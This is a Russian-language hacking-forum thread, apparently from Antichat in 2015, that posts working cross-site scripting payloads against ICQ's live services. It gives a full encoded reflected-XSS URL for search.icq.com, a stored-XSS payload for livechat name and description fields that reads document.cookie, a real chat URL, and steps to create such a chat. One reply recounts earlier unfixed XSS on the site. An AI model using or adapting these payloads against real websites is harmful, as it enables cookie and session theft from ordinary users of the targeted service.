XSS icq.com

Discussion in 'Skype, IRC, ICQ, Jabber и другие IM' started by kingbeef, 2 Nov 2015.

  1. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Code:
    http://search.icq.com/search/results.php?q=%5Cx3C%5Cx2Fscript%5Cx3E%5Cx3Cscript%5Cx3Ealert%5Cx28document.domain%5Cx29%5Cx3C%5Cx2Fscript%5Cx3E&ch_id=start&search_mode=web
    Куки с основного сайта.
     
    _________________________
    Vip77, alkos, ocheretko and 6 others like this.
  2. Poltergeist

    Poltergeist Member

    Joined:
    22 Jun 2010
    Messages:
    52
    Likes Received:
    18
    Reputations:
    9
    Т.н. reflected XSS на этом search.icq.com уже вычищают-вычищают много лет, и все никак, как видно. Их и постили на сайтах, где публикуют XSS, и я находил какие-то давным-давно. Помню, в 2012-м после редизайна страница профайла просто кишела stored XSS. Их там было порядка 15 штук на разных страницах. Потом пофиксили, но криворуко, поэтому был второй дубль, правда эксплуатация была чуть более замудренной. Но было весело.
     
  3. Poltergeist

    Poltergeist Member

    Joined:
    22 Jun 2010
    Messages:
    52
    Likes Received:
    18
    Reputations:
    9
    Stored XSS в ICQ лайвчатах. Пример:
    Code:
    https://icq.com/chat/AqGIzmxQTeANPGrCCw
    Уязвимы поля "Имя" и "Описание".
    HTML:
    <h1 class="gc_title">"><script>alert(document.cookie)</script></h1>
    <p class="gc_description">"><script>alert("Stored XSS")</script></p>
    Лайвчат можно создать через приложение для iOS или Android.